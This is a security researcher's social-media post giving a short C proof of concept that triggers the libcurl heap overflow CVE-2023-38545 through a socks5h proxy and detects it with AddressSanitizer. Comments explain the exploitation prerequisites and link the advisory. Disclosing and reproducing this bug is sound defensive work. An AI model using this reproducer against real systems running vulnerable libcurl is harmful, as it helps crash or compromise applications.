libcurl CVE-2023-38545 heap overflow detected by ASan.

Notices where this attachment appears

1. Embed this notice
   Harry Sintonen (harrysintonen@infosec.exchange)'s status on Wednesday, 11-Oct-2023 15:16:27 JST Harry Sintonen

   Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

   gcc -xc -fsanitize=address - -lcurl <<EOF
   # include <curl/curl.h>
   # include <string.h>
   int main(void)
   {
   CURL *curl = curl_easy_init();
   if(curl) {
   char url[32768];
   memcpy(url, "https://", 8);
   memset(url + 8, 'A', sizeof(url) - 8 - 1);
   url[sizeof(url) - 1] = '\0';
   curl_easy_setopt(curl, CURLOPT_URL, url);
   (void)curl_easy_perform(curl);
   curl_easy_cleanup(curl);
   }
   return 0;
   }
   EOF
   https_proxy=socks5h://127.0.0.1 ./a.out

   Some comments:
   • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
   • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
   • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
   • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

   #infosec